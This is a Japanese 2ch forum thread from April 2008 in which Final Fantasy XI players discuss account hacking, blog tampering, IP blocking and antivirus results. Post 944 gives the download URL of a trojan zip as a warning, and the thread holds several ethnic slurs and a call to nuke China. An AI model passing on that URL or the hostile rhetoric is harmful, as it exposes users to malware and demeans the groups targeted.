842 :既にその名前は使われています:2008/04/17(木) 03:53:59.78 ID:Xo5qTg3n
自分が使ってるソフトの信頼性や性能って調べないもんなのかな?
片っ端からソフトウェア板で調べたもんだがなぁ。

843 :既にその名前は使われています:2008/04/17(木) 04:17:42.97 ID:7nvQ9WVn
バンドルされててPC買った店の人に「これセキュリティソフト入ってるから何も追加しなくて大丈夫ですよ」
とでも言われたら、一般の人ならそれで安心してしまうと思うよ。

844 :既にその名前は使われています:2008/04/17(木) 04:23:40.89 ID:MABz+80/
>>842
そういう人ばかりだと現状はない。

S:せきゅなんとかってのいれたほうがいいらしい
A:たっけーな。あ、やすいのあるら
S:お、それ結構みんなつかってるらしいぞ
A:とりあえずいっこかってみるら

A:おい。登録しなくてもだいじょうぶら
S:そうか。じゃつぎおれいれるぞ

こういう会話が安易に想像できる

845 :既にその名前は使われています:2008/04/17(木) 04:24:30.56 ID:fMK10o+9
>A:おい。登録しなくてもだいじょうぶら
かわいい

846 :既にその名前は使われています:2008/04/17(木) 05:18:44.35 ID:JkT98k1H
知り合いなんか、PCが明らかにおかしいのに
(表示ボタンとか変なものになってる、勝手にウィンドウぽんぽん開く等)
「あー動くから大丈夫w」とか言ってるんだよな。
「最近アカハックとかあるから」って言うと
「FFはPS2だしLSCやんないしw」とか言う。
そういうとこだけは妙な知識あるのな。
お前が大丈夫wでも他に迷惑かけることもあるんだぞぼけと。


847 :既にその名前は使われています:2008/04/17(木) 06:43:35.62 ID:BICIICVk
2ch見る時にJavascript有効じゃないと見れませんと表示されるんだけど?
火狐とNoscriptでJava系とかIfream切ってるんだが、今までは見れたんだが、
昨日ぐらいから人多すぎと表示されるようになり、今日からこの状態に。。。

今はScriput切って閲覧書き込みだけど。。どうなってるのかな?

848 :既にその名前は使われています:2008/04/17(木) 07:02:31.64 ID:BtWdHIzT
むしろ2chブラウザ使わず人大杉にならないほうが(ry

849 :既にその名前は使われています:2008/04/17(木) 07:12:14.08 ID:Xo5qTg3n
>>847
JaneDoeとかの2chビューワ導入オススメ。
それと夜中は韓国からのDDoS攻撃で2ch自体が鯖落ちや不調だった。

850 :既にその名前は使われています:2008/04/17(木) 07:19:42.21 ID:ywZKWC3Y
普通のブラウザから見てること自体ありえないわ。
板によっては、人大杉表示で弾かれるところもあるし。

851 :既にその名前は使われています:2008/04/17(木) 07:49:12.74 ID:bOLa07cJ
>>847
ひろゆきの鶴の一声による2chの方針変更。
人大杉にする代わりにJavaScriptでdatを展開するread.htmlを
使うようになった(一部のサーバを除く)。

でも専ブラ推奨。

852 :既にその名前は使われています:2008/04/17(木) 08:00:25.99 ID:V0f5PEOg
>>851
それは.dat→HTMLの処理をいままで2chの鯖でやってたのを、各々のクライアントでするようにして負荷を減らしたって感じ?

853 :既にその名前は使われています:2008/04/17(木) 09:34:32.30 ID:bOLa07cJ
>>852
うん、それが狙いだったけど、効果は微妙らしい。
で、アンカポップアップなどのおまけ機能&人大杉回避の
裏技として使われてた。


854 :既にその名前は使われています:2008/04/17(木) 10:04:04.06 ID:OCJyh6v4
ちょいと質問。
SpywareBlasterを使ってるんだが、昨日から突然エラーを帰すようになって困ってる。

IEが終わってFirefoxの更新まで行き着くと、
「Error:Access violation at 0x005F71FC(tried to read from 0x0A880248), program terminated. 」
と出る。原因はなんだろうか?

855 :既にその名前は使われています:2008/04/17(木) 10:07:35.62 ID:RJj7B5VG
SpybotのFirefox免疫いれてる?
何だかこの前のアップデートからおかしくなったみたいで
SpybotのFirefoxクッキー以外のFirefox免疫切れば起動できるようになると思うよ

856 :既にその名前は使われています:2008/04/17(木) 10:14:49.47 ID:BICIICVk
>>849>>851
ありがとうです。専ブラウザ導入します

857 :既にその名前は使われています:2008/04/17(木) 10:15:56.68 ID:ggbTHZMk
Let's talk with Jim-san. Part9
http://set.bbspink.com/test/read.cgi/erobbs/1202891905/401

401 名前:jim ◆6P7QkQf8Ys @Apparently admin ★[] 投稿日:2008/04/17(木) 02:10:04 ID:???
The DDOS attack came from Korea. It is still going on, but we are finding the ways to block them.

858 :854:2008/04/17(木) 10:18:04.46 ID:OCJyh6v4
>>855
お、丁度そのあたりの書き込みをしようと思ってた所。
Spybotを同時起動して適応してたんで、そこはものすごく怪しんでた。
thx。ちょっと調整してみる

859 :既にその名前は使われています:2008/04/17(木) 10:29:11.54 ID:DMxbKXHa
Firefoxが更新されてます。
一応報告

860 :既にその名前は使われています:2008/04/17(木) 11:45:05.45 ID:Xo5qTg3n
2.0.0.13→2.0.0.14

861 :既にその名前は使われています:2008/04/17(木) 12:13:25.82 ID:WJG+yy+p
Safari3.1→3.1.1

862 :既にその名前は使われています:2008/04/17(木) 12:25:12.03 ID:hTMYrd/G
まだまだ垢ハックは続くのですage

863 :既にその名前は使われています:2008/04/17(木) 12:29:36.32 ID:FNt0Lq6u
Aはかわいいけど、Sはなんか威張ってて>>844みたいだ

864 :既にその名前は使われています:2008/04/17(木) 12:43:06.23 ID:FAlIICyV
中国からこっちへの攻撃が日本の法律で取り締まれないのはわかったが
こっちから特亜に攻撃仕返したら特亜はなんか出きるのかな、あいつら最近調子にのりすぎだろ

865 :既にその名前は使われています:2008/04/17(木) 12:54:58.55 ID:GBd0JIZa
PG2で「211.174.58.36」ってkoreaのipブロックしたんだけどこれって大丈夫ですか?
IP検索で調べてみてもよくわからないので助言お願いします。

59.151.50.51ってchinaのIPも弾いたんですが、これはfirefoxのサーバーでいいんですよね?

866 :既にその名前は使われています:2008/04/17(木) 13:26:02.03 ID:IPFPSCfw
そろそろPGスレあたりに誘導した方がいいかもな。
リネージュトロイの項目で引っかかった奴は確実にこっちの管轄だろうが
単に特亜IPでのブロックだとここに専門家がいるわけじゃないし。

867 :既にその名前は使われています:2008/04/17(木) 13:32:33.23 ID:oo11/E0C
最近

868 :既にその名前は使われています:2008/04/17(木) 13:35:28.20 ID:oo11/E0C
ミスった
最近はブログ改ざんの話聞かないけど
落ち着いてきたんか?
被害報告ないね(・∀・)

869 :既にその名前は使われています:2008/04/17(木) 13:38:37.84 ID:5li9mwwl
>>868
Blogの改竄はないけどしたらばとか使うようになってきた
もうやりたい放題

870 :既にその名前は使われています:2008/04/17(木) 13:39:09.69 ID:q2Au0Eg1
>>868
赤弱体スレと一緒で一部基地外が大袈裟に騒いでるだけ

871 :既にその名前は使われています:2008/04/17(木) 14:29:13.40 ID:+GwjM+RJ
業者の印象操作が来たか

872 :既にその名前は使われています:2008/04/17(木) 14:30:09.44 ID:VeMppXEy
>>870
赤弱体スレと同じように考えてる時点でおかしいな?

業者の工作があからさまになってるのは、本当に見苦しいし必死過ぎるな
ゲーム内の迷惑行為に留まらず、あらゆる場所で迷惑な業者もとい犯罪者は全員氏ね

873 :既にその名前は使われています:2008/04/17(木) 14:36:27.51 ID:3+cy4FD/
ちと質問なんだが
FF専用PC購入予定で回線を50MのADSLに変更しようかと思っている
セキュリティはKDDIのADSLルーターレンタル大丈夫なのかな?
自分でルーター購入した方がいいものなのかどうかを知りたい

874 :既にその名前は使われています:2008/04/17(木) 14:40:07.48 ID:Xo5qTg3n
専門的すぎてルーターのスレで聞いた方がいいと思われ。

875 :既にその名前は使われています:2008/04/17(木) 14:42:36.70 ID:5li9mwwl
>>873
その辺の量販店で売ってるようなルータならKDDIのルータとかわらん
NTTとかKDDIがレンタルしてるルータはそもそもNECとかのOEMだからな

876 :既にその名前は使われています:2008/04/17(木) 14:51:12.08 ID:3+cy4FD/
レスサンクス
気にせずレンタルルーターにしてみるわ

877 :既にその名前は使われています:2008/04/17(木) 15:06:35.84 ID:Y0KqB6b9
>>865
i-on.netっつー韓国のIT企業のようだが、おまえさん心当たり無いのかね。

878 :既にその名前は使われています:2008/04/17(木) 15:34:48.21 ID:hTMYrd/G
sage進行は怖いねage

879 :865:2008/04/17(木) 16:00:24.87 ID:DrkA7skK
>>877
返答ありがとうございます
自らネットに接続はしていなく、朝からPCつかっぱなしで放置していました。
いざPCの前に戻ってPG2の履歴を確認したら12時ごろにブロックされてました。

880 :既にその名前は使われています:2008/04/17(木) 16:08:20.85 ID:XtoEvMMH
正規サイト改竄が多発、9割以上は脆弱性放置〜シマンテック調査
ttp://internet.watch.impress.co.jp/cda/news/2008/04/17/19265.html

881 :既にその名前は使われています:2008/04/17(木) 16:17:39.49 ID:CiLEg4or
>>872
>ゲーム内の迷惑行為に留まらず、あらゆる場所で迷惑な業者

DL同人販売サイト、DLSITE.COMの17日の新着を見てワロタよ、これはネタなのか何なのかと。


882 :既にその名前は使われています:2008/04/17(木) 16:30:47.21 ID:IGA0PPjZ
2,730円はたっけぇな。

あれかな、本業で儲からないけど「株で儲かる本」「なんとか父さん」で儲けるたいなもんかな。

883 :age:2008/04/17(木) 17:03:42.00 ID:dFa9xwfC
>>865
182 :既にその名前は使われています[]:2008/04/05(土) 05:49:19.36 ID:PLAOpOIW
    >>179
    前に、気付いて調べてみたけど、DNSサーバによって、

     www.mozilla.com → 59.151.50.31 (1社のみ確認)
     www.mozilla.com → 63.245.209.10 (or63.245.209.xxとか)

    になるところがある。
    ブラウザーで、[59.151.50.31]にアクセスしても、数回リダイレクトされて
    最終的に[63.245.209.10]のページが表示される。
    プロバイダ数社のDNSで調べたけど、[59.151.50.31]になるのは、
    1社(B社)だけだった。
    B社だけ、DNSの情報が古いのかもしれんし、業者にハックされてるのかは分からん。

    ちなみに、B社のDNSに、wwwなしで問い合わせると、[63.245.209.10]を返す。
    mozilla.com → 63.245.209.10 (B社)
    [59.151.50.31]は、FireFoxの昔のIPかもしれんが、原因が分からんの
    うちは、ブロックままにしてる。
    英語のFireFoxサイトだから、ブロックしてても支障はないかと。

884 :既にその名前は使われています:2008/04/17(木) 17:48:37.96 ID:yVfeiEst
Firefoxってタイワンに鯖あんの?
更新DLしようとしたときにPG2がブロックしたぜ?

885 :既にその名前は使われています:2008/04/17(木) 18:03:57.07 ID:tYNyiluW
やっと公式にて発表したな
ttp://blog.blog2.fc2.com/blog-entry-75.html

886 :既にその名前は使われています:2008/04/17(木) 18:07:36.76 ID:mu9q/hpa
公式w

887 :既にその名前は使われています:2008/04/17(木) 18:09:36.56 ID:hwhoTx2D
>>885から引用
【不正アクセスから守る為の対処方法】
・WindowsUpdateによりご利用のPCの状態を最新の状態にする。
・ご利用のウイルス対策ソフトのバージョンを最新の状態にする。
・怪しいWEBサイトへのアクセスを行わない。
等、あらかじめ対策を行って頂きますよう、お願い申し上げます。

公式発表があったのはそれなりに進歩だが、自分達のセキュリティでの非は一切認めてないなこりゃ

888 :既にその名前は使われています:2008/04/17(木) 18:12:21.85 ID:wqQKZcS/
遅すぎわろた

889 :既にその名前は使われています:2008/04/17(木) 18:12:58.31 ID:gkAhrVeq
■eの公式と同じことしか買いてないなw

890 :既にその名前は使われています:2008/04/17(木) 18:15:44.79 ID:mu9q/hpa
なんで業者ここまで必死なんだろうな

891 :既にその名前は使われています:2008/04/17(木) 18:19:28.23 ID:7nvQ9WVn
そりゃ儲かるからさ。生活かかってんだからあっちは必死だぜ。

892 :既にその名前は使われています:2008/04/17(木) 18:22:41.21 ID:b3kke5so
>>830
>「POLにようこそ!入会の手続き〜」
>といった感じのPOL初回起動時に出る設定画面が出てきました。
それ俺がハックされる前日に落とされて入りなおすとき出たな
POL&テトラマスターの設定を保存していますって出た後
10回位キャンセルさせられ、進んだ先がその画面

893 :既にその名前は使われています:2008/04/17(木) 18:32:05.05 ID:wYnS6UdA
>>885
最近改竄の報告無いと思ってたら、やっぱりこっそりと穴塞いでいやがったかw
しかもユーザーに非があるような書き方しやがって…

894 :既にその名前は使われています:2008/04/17(木) 18:52:32.82 ID:rjaxPEbO
次に中国から狙われるブログはどこだろな。
にんじゃwかアメブロwかw
かなりFC2から分散したからな。
MPK状態じゃね?www

895 :既にその名前は使われています:2008/04/17(木) 18:59:30.72 ID:yOQz9lZX
人の多いブログってどこか?
業者が類似URL登録してるところはどこか?
それを考えれば答えは出てくる。 知らないけど。

896 :既にその名前は使われています:2008/04/17(木) 19:02:09.11 ID:bOLa07cJ
改竄されるヘタレシステムでなければ大事にはなるまい。
FC2は既存の人気ブログが改竄されたから被害甚大だったわけで。
業者が作るコピーブログは閲覧者が少ないし、大抵のブログサービスは
通報すれば停止してくれる。

897 :既にその名前は使われています:2008/04/17(木) 19:10:28.81 ID:XLTCjA+B
最近移転したようなブログは管理に気をつけてるから狙わないだろう。
ほとんど放置状態だがアクセスは多いブログが業者には一番都合がいい。
某青魔、ぺってん、ヴァナモンはその典型と言える。

898 :既にその名前は使われています:2008/04/17(木) 19:10:39.82 ID:rjaxPEbO
そっか。
いや、な・・・自分の利用してるブログサービスにもFC2からやたら避難者が漂流してきたわけなんだがw
これってまるでMPKじゃね?www
って思ってみただけなんだ。スマソ。
そうだなw大手人気ブログじゃなきゃ罠張っても意味無いもんなw
安心することにするよチラ裏すまんかった。

899 :既にその名前は使われています:2008/04/17(木) 19:19:46.84 ID:JkT98k1H
>898
同人女うざい。
でも乙。

PG入れてもブロック履歴が全然つかなくて、ほんとに動いてるのか?って不安になって
中国の普通のサイトを見に行ってブロックされるのは自分だけでいい。

900 :既にその名前は使われています:2008/04/17(木) 19:30:19.74 ID:6ms3zsv0
Skype入れてみ。

すんげぇ数ブロックします。知らないうちは超不安だったんだぜw

901 :既にその名前は使われています:2008/04/17(木) 19:37:40.86 ID:hwhoTx2D
>>898
大手のブログが閲覧者に迷惑をかけたくない一心でfc2からよそに引っ越していることを、
中華っていうモンスターを引き連れて自分のやってるブログまで巻き込みに来た と表現してるのか
ちょっとばかり失礼ですな

902 :既にその名前は使われています:2008/04/17(木) 20:11:51.40 ID:rjaxPEbO
>>901
気分悪くしたならすまない。謝ります。
つい皮肉っぽく言ってしまったからそう取られて仕方ないけれど今まで
「FC2こそがFFブログの大御所だよね―^^^」
だったヤシらがFC2が騒がれた途端
「ぇ―wだって見に来てくれる人に悪いしw」ならまだわかる。
「FC2でブログやってると評価落ちちゃうしw」
って今までFC2マンセーだったのにあっさり寝返ったのに少し何なんだって思ったんだ。
気分悪くして申し訳ないです。

903 :既にその名前は使われています:2008/04/17(木) 20:17:44.71 ID:IPFPSCfw
ブロガーの主成分が僻みとエスパーでできてることはよく分かった

904 :既にその名前は使われています:2008/04/17(木) 20:23:27.38 ID:NdfJnLYS
>>902
思考がおかしいw

905 :既にその名前は使われています:2008/04/17(木) 20:24:40.53 ID:/5l8kl4p
>>902
このスレ的には、内心がどうだろうと管理してくれてるならそれでOK
改竄されやすいことが明白なFC2から自主的に移ってくれているだけで有り難いよ

それともなにかい?
FC2に大手やらFFブロガーが多数いてくれたら、その方が
他社のブログが攻撃受けにくいだろうから人身御供的に居続けてくれとでも?


906 :既にその名前は使われています:2008/04/17(木) 20:41:31.83 ID:VeMppXEy
FC2から公式発表があったようだが、利用者に対してメールでの警告はしてないようだな
クズエニもそうだが、こういうセキュリティ上の問題は余り大きく取り上げていないのが糞過ぎる

にしても動きが遅過ぎるな…
ブログ以外でも改竄が相次いでいるのに、全く持って危機感が無い

907 :既にその名前は使われています:2008/04/17(木) 20:55:34.07 ID:ZE2+ZYcP
やっとFC2から発表きたんだね。
テンプレ改ざんなんてたくさんだ。

908 :既にその名前は使われています:2008/04/17(木) 21:02:35.88 ID:lNq2oT84
業者は中国共産党員だからな。
国を上げての外貨稼ぎだ。
Ddosやったりアカハックしたりと技術も発達してるし、そろそろなんとかしなきゃな。

909 :既にその名前は使われています:2008/04/17(木) 21:19:27.73 ID:Xo5qTg3n
>>906
植松のコンサートとか糞ゲの紹介とか駄文送りつけてくるくせに必要なことはしない
んだよねぇ。

910 :既にその名前は使われています:2008/04/17(木) 21:23:44.61 ID:wN3zgwlq
海外、特に日本には何をしてもお咎め無しだからな
犯罪やり放題な国だよ、全く・・・・

911 :既にその名前は使われています:2008/04/17(木) 21:38:48.14 ID:NGJqX6C6
PG2導入でデフォで選べるフィルタ(広告とかP2Pとかスパイウェア)を更新しようとすると
ワシントン大学とかカリフォルニア大学とかハーバー大学とかがブロックされる(´・ω・`)ボスケテ

912 :既にその名前は使われています:2008/04/17(木) 21:39:56.39 ID:PKIKagib
垢ハック対策でIE以外のブラウザFirefox使ってた。
でも壷使えなくて、困ってた。
今VerUpしたSafari使ったら、壷使えるのね。コレ。
軽いし(メモリ喰わない)これから、メインに使うかもしれん。

913 :既にその名前は使われています:2008/04/17(木) 21:41:08.92 ID:hwhoTx2D
>>911
ブロックしたときのIP分かるでしょ
履歴を表示>ブロック>該当IPを右クリ>解除

914 :既にその名前は使われています:2008/04/17(木) 22:20:51.96 ID:Sa9DC/NZ
>>887
いちおう不正アクセスがあったことと改ざんを受けたことは認めてるジャン。
そこんとこがポイントではっきり1文に書くべきところだとは思うけどw
隠してもバレてるし、無料ブログで規約上何かする必要もないから、
さらっと流した感じだけど。

やれやれ。これでやっと確定事項になったね。

915 :既にその名前は使われています:2008/04/17(木) 22:23:50.82 ID:Y0KqB6b9
>>912
Firefoxで壷(無料版のほう)使えてるけど?

916 :既にその名前は使われています:2008/04/17(木) 22:25:34.15 ID:PKIKagib
>>915
む?俺の壷が古いのか・・・

917 :既にその名前は使われています:2008/04/17(木) 22:31:26.62 ID:kahVW4Dz
>>908
7月や10月に米国防省やドイツ外務省にハッキングした事件では
犯人は中国軍と推定されている

あの軍隊、非対称戦争ドクトリンの一貫として主要国最大のハッキング部隊を抱えてるから厄介だよ

918 :既にその名前は使われています:2008/04/17(木) 23:22:20.26 ID:PKIKagib
>>915
ちっと確認したら、壷のプロクシ、「自動設定」で使えるのが、IE, Safari だった。
Firefox, Opera の場合、プロクシ、手動で設定すれば使えるんだな。
2ch見るときしか壷上げないので、「自動設定」で使える Safari は楽でいいと思った。


919 :既にその名前は使われています:2008/04/17(木) 23:35:35.84 ID:ng4wrzzZ
2ch用のブラウザは使っていないのですが、
数日前から「javasprictを有効」にしないと読み込み中となって
見れなくなってしまいました。
2chをjavasprictを有効に設定しても大丈夫でしょうか?
よく解ってなくて変な質問ですみません。


920 :既にその名前は使われています:2008/04/17(木) 23:36:59.18 ID:hwhoTx2D
>>919
>>847-853くらいを読むよろし

921 :既にその名前は使われています:2008/04/17(木) 23:43:39.51 ID:ng4wrzzZ
>>920さん
ありがとうございます。自分も>>847さんと同じ火狐でした。
やっぱり自分もブラウザ使うようにしようかな

922 :既にその名前は使われています:2008/04/17(木) 23:47:59.93 ID:Zccc3jz2
Firefoxで専ブラを別に立ち上げるのがめんどくさかったら
bbs2chreader
っていうアドオン入れておけばいいんじゃないかな?かな?

923 :既にその名前は使われています:2008/04/17(木) 23:55:30.57 ID:zY+GzO3d
>>921
>>920が言わんとした事理解してる?
てか、火狐ってブラウザの一種なんだが…

>>847とあなたが同じ環境なわけないんだから、素直にプロバイダに電話して、ウイルス対策ソフト&ファイアウォールいれとき。

924 :既にその名前は使われています:2008/04/17(木) 23:59:46.72 ID:PKIKagib
無料「壷」&「Safari 」の組み合わせが、個人的に気に入った。
IEみたく、自動設定でプロクシ変わるし。
2ch専用に「壷」&「Safari」はありかもしれん。
あくまで、個人的意見。

925 :既にその名前は使われています:2008/04/18(金) 00:20:24.93 ID:a6M/nPCM
保守

926 :既にその名前は使われています:2008/04/18(金) 00:23:01.52 ID:5l6vq8e7
PG2がLimelight Networks Asia Pacificってところへの送信をブロックしまくりなんですが、
これってなにか、わかる人いますか?


927 :既にその名前は使われています:2008/04/18(金) 00:40:44.62 ID:4RqJH3zH
>>926
全く問題ない
www.microsoft.com/japan/presspass/detail.aspx?newsid=3028

928 :既にその名前は使われています:2008/04/18(金) 00:41:18.82 ID:1++51GUf
>926
ttp://e-words.jp/w/CDS.html
↑の類の1つかね?


929 :既にその名前は使われています:2008/04/18(金) 00:42:08.56 ID:5l6vq8e7
>>927,928
ありがとう。安心した。


930 :既にその名前は使われています:2008/04/18(金) 02:23:20.92 ID:RYkZkaFi
208 サルベージ

931 :既にその名前は使われています:2008/04/18(金) 03:35:52.23 ID:xKDqdlq1
俺も今火狐の更新確認でPGが反応したわ。
面倒だから読み込み停止(通称しいたけ)ボタン押してそれっきりだけど

932 :既にその名前は使われています:2008/04/18(金) 04:06:23.15 ID:Se/1Iuiv
そろそろ中国に核を打ち込んでもいいと思うんだ。
アメリカよろ。

933 :既にその名前は使われています:2008/04/18(金) 04:09:54.65 ID:XqX15o2C
すまん、詳しい人いたら検体の捕獲方法とやらを教えてくれないか

934 :既にその名前は使われています:2008/04/18(金) 04:41:00.85 ID:O9RFMFcg
>>932
ほっといても自滅するんじゃない?
オリンピックもグタグダになりそうだし、終わったら急激に萎みそう
そういえば、ソ連だったかな。問題起こして各国にボイコットされて、
そのあと崩壊したのは
厨国も同じ道を辿るのかなww

935 :既にその名前は使われています:2008/04/18(金) 05:09:20.38 ID:wsNmcLNw
>>932
被爆国民の言っていい話ではないな。核はまずいぜ。

936 :既にその名前は使われています:2008/04/18(金) 07:11:58.23 ID:4XwvN0am
>>932
マジレスしとこうか。
ICBMないしはそれに順ずる核戦力を保有する米露中英仏
(この5ヶ国は国連安保理常任理事国でもある)は
相互に壊滅的な打撃を与えることになるので
撃ち合うことはありえない。
# ICBM保有は米露中のみ、英仏はSLBM(潜水艦)。
近くの島国に3発目の核を撃つ以上にありえない。

>>933
HTMLやscriptを読んでexeを拾う。
あるいは仮想環境で実際に踏む。

937 :既にその名前は使われています:2008/04/18(金) 07:20:05.02 ID:ytBkocP7
>>932
そんな野蛮なことしなくても、経済封鎖&人的交流の停止で自滅させればいい。
もちろん、ネット回線も物理的に遮断w

938 :既にその名前は使われています:2008/04/18(金) 08:15:08.36 ID:K++Xwi7+
>>899
なんという俺。
全くブロック履歴でないからwikipedia見に行ったぜ。

939 :既にその名前は使われています:2008/04/18(金) 08:19:19.86 ID:SVPYbIT6
むしろ奴らの国はこの先発展して大きくなると思うよ。
周りの国から技術力を盗みまくってるし労働力も国土もある。

職場に中国人研修生がいるんだが、あの貪欲さを見てると日本やべぇなーと思うわ。

940 :既にその名前は使われています:2008/04/18(金) 08:33:53.78 ID:gby7kO0Y
うちの職場に研修に来た中国人は実行してない試験項目を全部チェック済みにした言い訳が
「だってめんどくさいヨー」だったりするような奴だったけどな。
職種とかによって違うんだろうけど。

941 :既にその名前は使われています:2008/04/18(金) 09:18:58.94 ID:jySIS87Q
age

942 :既にその名前は使われています:2008/04/18(金) 09:40:19.58 ID:AUAWGNAu
中華w業者が当然w多いんだが
中華wwだけじゃなくて他の国にも気を付けないといけないみたいだ。
FF外の知り合いから、アジア以外の国のRMT業者について聞く機会があった。
FFじゃなくて別ゲームだったけど。

943 :既にその名前は使われています:2008/04/18(金) 09:55:28.56 ID:4XwvN0am
いにしえのUOからWoWまでRMTはほとんど中国、
買い手は米韓(金額でそれぞれ日本の10倍)。
東南アジアでもアカウントハック含めてRMTあるけど
米韓←→中国 の市場からしたら鼻くそみたいなもん。

944 :既にその名前は使われています:2008/04/18(金) 11:30:54.03 ID:hUvVkJcz
こんどの手口はどうも直接テルで罠zipを踏ませるものっぽいな。
さっきテルうけた。猫さばでPatiant。

(httpころんすらっしゅしゅらっしゅ)uploadsite2.tripod.com/nmradar.zipだった。

945 :既にその名前は使われています:2008/04/18(金) 11:32:43.63 ID:4XwvN0am
洋鳥か、懐かしいな

946 :既にその名前は使われています:2008/04/18(金) 11:51:56.37 ID:xKDqdlq1
>>944
通報しる

947 :既にその名前は使われています:2008/04/18(金) 11:56:05.26 ID:4XwvN0am
>>944
ttp://www.virustotal.com/analisis/2650170f471e3e497b56e3283f9b1980
捕獲 AntiVir avast AVG BitDefender Dr.WEB
スカ Norton McAfee Kaspersky NOD32
有名どころがだめぽ

948 :既にその名前は使われています:2008/04/18(金) 11:56:37.36 ID:hUvVkJcz
した。複数から被害報告ありらしい。今猫さば掲示板でネタになってる。

949 :既にその名前は使われています:2008/04/18(金) 11:58:20.49 ID:wd95rpNR
カスペルさんがダメだと!?

950 :既にその名前は使われています:2008/04/18(金) 12:01:02.87 ID:4XwvN0am
そいつが無差別tell送る中華というのが素直な見方だけど
無差別tell送るウイルス踏んだ一般プレーヤという可能性もあるねぇ。

一般プレーヤというよりツーラーで罠入りツール踏んだ可能性もまたある
(おまんこシャウトの罠入りツールとかあったように)。

951 :既にその名前は使われています:2008/04/18(金) 12:03:16.45 ID:4XwvN0am
あれ、ハッシュ同じなのに2回目は微妙に違う(Packer判定とか)。
ttp://www.virustotal.com/analisis/53060b8e19fdc87d3804645eda0e9b9d
とりあえず「not-a-virus:Monitor.Win32.Perflogger.ca」とおっしゃったKaspersky軍曹には送った。

952 :既にその名前は使われています:2008/04/18(金) 12:11:13.80 ID:hUvVkJcz
カスペルが効かないとは・・・やるな中華。

一応、NAの最古参と一級廃神にも注意喚起しておいた。
(NAへの対応は早いと信じてね)

953 :既にその名前は使われています:2008/04/18(金) 12:13:41.45 ID:wd95rpNR
>>944
ていうかテルってTell?
ヴァナでのTellっすか?

954 :既にその名前は使われています:2008/04/18(金) 12:16:29.17 ID:8GfohbPK
>>951
GJ

955 :既にその名前は使われています:2008/04/18(金) 12:16:46.96 ID:f/f8A0mw
ブログ改ざんが出来なくなった?せいか
罠コメントがまた増えてきてうぜーうぜー。
実際にあるサイトに似せたURL取って罠仕掛けたりしてるから気をつけろよ皆。

956 :既にその名前は使われています:2008/04/18(金) 12:41:21.85 ID:nhehUMDE
>>944
こっちのスレでカスペルさんが検出してるんだが

【Free】RMT業者を通報しまくれ ver.12【Tibet】
ttp://live27.2ch.net/test/read.cgi/ogame/1207965577/238

あっちに12時にありがとう、こっちで>>952の返しってどゆこと?

957 :既にその名前は使われています:2008/04/18(金) 12:53:15.28 ID:9TY8GpUh
>>955
できなくなったというより広く告知されたから
やらなくなっただけだろうな。
忘れた頃に新たな手口で再開するに違いない。

958 :既にその名前は使われています:2008/04/18(金) 13:03:11.61 ID:0M5j1Hnj
>>956
IDまで見てなかったから、気付かなかったけど、
通報スレのレスを見ると、>>952のレスは、おかしいなw

959 :既にその名前は使われています:2008/04/18(金) 13:26:15.81 ID:hUvVkJcz
ごめん。レス付け損ねた。遅まきながらありがとう。

>>953直接テルでくる。ヴァナにいる奴で掲示板見ない奴狙いじゃないかな。
Qutting FFXI...(URL) Enjoy xD

960 :既にその名前は使われています:2008/04/18(金) 14:03:00.71 ID:X3hAcPby
見知らぬ他人からのURLtellでそのサイトに行こうと考えないよな。

961 :既にその名前は使われています:2008/04/18(金) 14:54:46.71 ID:4XwvN0am
まーあんなzipやrarをわざわざ解凍して実行するなんて
ツーラー予備軍だから勝手にハクられてくれとは思う。

962 :既にその名前は使われています:2008/04/18(金) 15:20:21.83 ID:wd95rpNR
流石に被害者少ないだろうなぁ・・・w

FC2も穴ふさいだし、しばらくは沈静化しそうだね。

963 :既にその名前は使われています:2008/04/18(金) 15:20:46.74 ID:wd95rpNR
お礼言い忘れた

情報&解説ありがとー!

964 :既にその名前は使われています:2008/04/18(金) 15:26:05.63 ID:+3bYISKX
ほす

965 :既にその名前は使われています:2008/04/18(金) 15:39:41.74 ID:tzH7mCB1
ここでは、妙に非IEエンジンのブラウザ推奨みたいだが、
Updateきちんとして、まともなルーター、アンチウィルスソフト、PG2導入。
その上で、IE上のJavaスクリプト、IRAME切るだけじゃダメなんか?


966 :既にその名前は使われています:2008/04/18(金) 15:54:30.34 ID:+3bYISKX
>965
詳しくはわからんが、単純にそっちのが手間じゃね?

967 :既にその名前は使われています:2008/04/18(金) 16:15:23.11 ID:XC3++snF
>>965
リアルプレイヤー削除もお忘れなくw
IE以外推奨してるのは現状対策して安全になったとしても
新たな脆弱性が見つかったときにまっさきにIEが狙われるから
その予防の面もあるんじゃないか?

968 :既にその名前は使われています:2008/04/18(金) 16:15:57.90 ID:X3hAcPby
真っ先にIEが狙われるから被害を回避しやすいって理由もあるね。

969 :既にその名前は使われています:2008/04/18(金) 16:47:26.28 ID:zRgBPCRx
>>965-968
IEをFC2に変えて読んでみると・・・・・・・不思議!

970 :既にその名前は使われています:2008/04/18(金) 16:53:07.93 ID:4XwvN0am
>>969
Windowsでも同じこったなw

971 :既にその名前は使われています:2008/04/18(金) 17:13:12.35 ID:hUvVkJcz
買い物からかえってきた。情報ありがとう。

972 :既にその名前は使われています:2008/04/18(金) 18:53:44.65 ID:7ZWSVrmt
228 ホシュ

973 :既にその名前は使われています:2008/04/18(金) 19:09:09.90 ID:Ph8XAWXv
そろそろ次スレか。
今は祭りがないから990迫るまで待ってもいいかもね

974 :既にその名前は使われています:2008/04/18(金) 20:11:11.90 ID:+3bYISKX
次スレが ほす いなー!

975 :既にその名前は使われています:2008/04/18(金) 20:16:59.18 ID:JWnAOXDv
PCでFF(パスは手打ち)やってるからパス抜きが気になって
笑われるかもしれんがウイルスバスターでスキャンしたところ0件

念のため、ここでイチオシのカスペオンラインスキャンもやってみたが
こっちでは3つウイルス検出された・・・

つまりそういうことか

976 :既にその名前は使われています:2008/04/18(金) 20:53:30.02 ID:zxTvtVU2
バスターは検出率以前に重い
重いっつーか不具合っぽく重いから糞としか言いようが無いw

977 :965:2008/04/18(金) 20:58:50.14 ID:tzH7mCB1
>>967
リアルプレイヤーは、元々インスコしてないんで大丈夫w
しかし、FireFoxも個人的に操作性の面で性に合わなかったし、
IE7は良く落ちるしで、俺は、このままIE6で頑張るよ……。
いや、何となく非IEエンジンのブラウザにすれば安心、
みたいな油断したカキコが多いので、ちょっと気になっただけだ。

978 :既にその名前は使われています:2008/04/18(金) 21:03:55.07 ID:RYkZkaFi
>>975
その3つを具体的に

979 :既にその名前は使われています:2008/04/18(金) 21:14:23.81 ID:JWnAOXDv
>>978
最終的に6つに増えてた
バスターで元々隔離されてたウイルス4つと、ニィと洒落もウイルスだと診断されたみたい
